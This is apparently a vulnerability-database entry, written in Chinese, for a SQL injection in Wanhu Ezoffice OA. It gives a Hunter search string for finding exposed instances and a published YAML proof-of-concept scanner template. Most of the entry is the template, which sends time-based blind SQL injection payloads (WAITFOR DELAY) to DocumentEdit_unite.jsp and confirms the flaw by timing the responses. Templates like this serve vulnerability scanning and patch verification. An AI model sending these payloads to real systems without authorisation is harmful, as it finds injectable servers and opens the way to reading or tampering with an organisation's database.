wanhu-defaultroot-sqli-2: 万户 Ezoffice OA defaultroot SQL注入

日期: 2025-09-01 | 影响软件: 万户EzofficeOA | POC: 已公开

漏洞描述

Hunter: app.name="万户 Ezoffice OA"

PoC代码[已公开]

id: wanhu-defaultroot-sqli-2

info:
  name: 万户 Ezoffice OA defaultroot SQL注入
  author: zan8in
  severity: high
  verified: false
  description: |-
    Hunter: app.name="万户 Ezoffice OA"
  tags: wanhu,sqli
  created: 2023/12/08

rules:
  r0:
    request:
      method: GET
      path: /defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1%20WAITFOR%20DELAY%20%270:0:5%27--%20FMZL
    expression: response.status == 200 && response.latency <= 6000 &&  response.latency >= 5000
  r1:
    request:
      method: GET
      path: /defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1%20WAITFOR%20DELAY%20%270:0:9%27--%20FMZL
    expression: response.status == 200 && response.latency <= 10000 &&  response.latency >= 9000
  r2:
    request:
      method: GET
      path: /defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1%20WAITFOR%20DELAY%20%270:0:5%27--%20FMZL
    expression: response.status == 200 && response.latency <= 6000 &&  response.latency >= 5000
  r3:
    request:
      method: GET
      path: /defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1%20WAITFOR%20DELAY%20%270:0:9%27--%20FMZL
    expression: response.status == 200 && response.latency <= 10000 &&  response.latency >= 9000
expression: r0() && r1() && r2() && r3()

相关漏洞推荐